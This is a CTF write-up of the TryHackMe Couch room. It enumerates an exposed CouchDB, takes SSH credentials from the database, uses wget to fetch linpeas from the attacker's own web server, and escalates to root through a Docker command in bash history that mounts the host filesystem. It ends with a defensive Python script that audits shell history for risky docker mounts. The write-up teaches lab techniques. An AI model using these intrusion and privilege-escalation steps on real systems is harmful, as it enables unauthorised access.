This is my first writeup with a YouTube video, and it's for the Try Hack Me Couch room!
You can watch it here or continue reading below!
The Couch Writeup!
So, I decided on the couch room on Try Hack Me (Links at the bottom to the room)
This was an interesting room to complete as it has quite a clever predetermined path to privesc, maybe I just made it harder than I needed to….
The brief has a few additional steps. I identified 3, and if you follow the writeup you will be able to answer all of those. The three I identified were:
- Find the credentials in the database
- Identify the User.txt flag
- Find the Root.txt flag
As always, I started out with an Nmap scan with the following parameters:
nmap -sV -sC -p- -oN ./nmap/initial <THM_IP>
These are the results I got;
So no HTTP site on 80 but CouchDB on 5984, sometimes -p- on nmap is worth it!
Let's have a look at that HTTP site on 5984.
Two options now: I can either read the CouchDB technical documentation or I can see if Gobuster finds anything.
Let's try Gobuster first using the below;
gobuster dir -u http://<THM_IP>:5984 -w /usr/share/wordlists/dirbuster/big.txt # if you don't have a big.txt wordlist, you can substitute this for one you have
The results weren’t great……
So, let's amend our Gobuster command to;
gobuster dir -u http://<THM_IP>:5984 -w /usr/share/wordlists/dirbuster/big.txt -b 400,404 # Gobuster normally filters out 404, but if you use -b you have to put 404 back in there or it won't filter those out too
This looks better;
Use the _utils page and we will see what's in the database;
If you click through secret, you will find the credentials you need for Atena.
Atena and Her SSH
So, let's pretend to be Atena by using the below;
Obviously, we’re going to ls to see what Atena has in her home directory…..
The user flag is ours!
So being Atena was great and all, but we need root!
There’s a couple of options out there but I decided to upload linpeas and run it
python3 -m http.server # start a webserver in the directory you have linpeas stored, take note of the port
wget http://<Your_THM_IP>:<Your_Webserver_port>/linpeas.sh # from the THM Box side
chmod +x linpeas.sh
./linpeas.sh
So after letting this run, a couple of things stood out to me in addition to what linpeas was marking up;
- Docker was installed and while not directly vulnerable, it's not always on a THM Box
- Bash history was readable by the user
So let's sneakily read Atena’s history
There is a lot in there but that Docker command is interesting, so let's copy it and run it!
So we are now inside a container.
From here I tried to cd to root with no luck, so instead I tried the following
cd mnt
ls
cd root
ls
cat root.txt
We have it!
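The two findings above (a docker command left in a shell history, and a container in which the host's files show up under /mnt) are something a defender can audit for. The following is an added example, not part of the original writeup or the room: the history lines are constructed, the function names are hypothetical, and the rule set is an assumed starting point built on standard Docker CLI options (`-v`/`--volume`, `--privileged`, `--pid=host`).

```python
import shlex

# Constructed sample of a shell history; not taken from the room.
SAMPLE_HISTORY = """\
ls -la
docker ps
docker run --rm -it -v /:/mnt alpine
sudo docker run -d --privileged --name web nginx
docker run --rm -v /srv/app/data:/data:ro alpine cat /data/readme
echo "unterminated
"""

# Assumed rule set: options and host paths that give a container host-level access.
RISKY_FLAGS = {"--privileged", "--pid=host"}
SENSITIVE_SOURCES = ("/etc", "/root", "/var/run/docker.sock")

def mount_sources(tokens):
    """Yield the host-side path of every -v/--volume bind mount."""
    for i, tok in enumerate(tokens):
        if tok in ("-v", "--volume") and i + 1 < len(tokens):
            yield tokens[i + 1].split(":", 1)[0]
        elif tok.startswith("--volume="):
            yield tok.split("=", 1)[1].split(":", 1)[0]

def audit_line(line):
    """Return the reasons a history line is a risky `docker run`, if any."""
    try:
        tokens = shlex.split(line)
    except ValueError:  # unbalanced quotes: fall back to a whitespace split
        tokens = line.split()
    if "docker" not in tokens:
        return []
    args = tokens[tokens.index("docker") + 1:]
    if "run" not in args:
        return []
    reasons = [f"flag {t}" for t in args if t in RISKY_FLAGS]
    for src in mount_sources(args):
        if src == "/" or src.rstrip("/") in SENSITIVE_SOURCES:
            reasons.append(f"host path {src} mounted into container")
    return reasons

def audit_history(text):
    """Map 1-based line numbers to findings for every flagged line."""
    findings = {}
    for n, line in enumerate(text.splitlines(), start=1):
        reasons = audit_line(line)
        if reasons:
            findings[n] = reasons
    return findings

if __name__ == "__main__":
    for n, reasons in audit_history(SAMPLE_HISTORY).items():
        print(n, "; ".join(reasons))
```

A hit means an account that can run such a command effectively has root on the host, so the fix is to restrict who can reach the Docker daemon, not to clean the history file.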
Try Hack Me Couch Conclusion
I did enjoy that box!
Maybe I went round the houses for the Privesc and should have just tried bash history first, but this is where a tool like linpeas really comes into its own, because if it wasn’t that then I'd have been going down a different route.
I hope you enjoyed attempting this room too!
Go to Tryhackme.com for this and many more CTFs
Room – TryHackMe Couch Room – Thank you to stuxnet for creating this!
Contact me – Any suggestions or room requests, get in touch!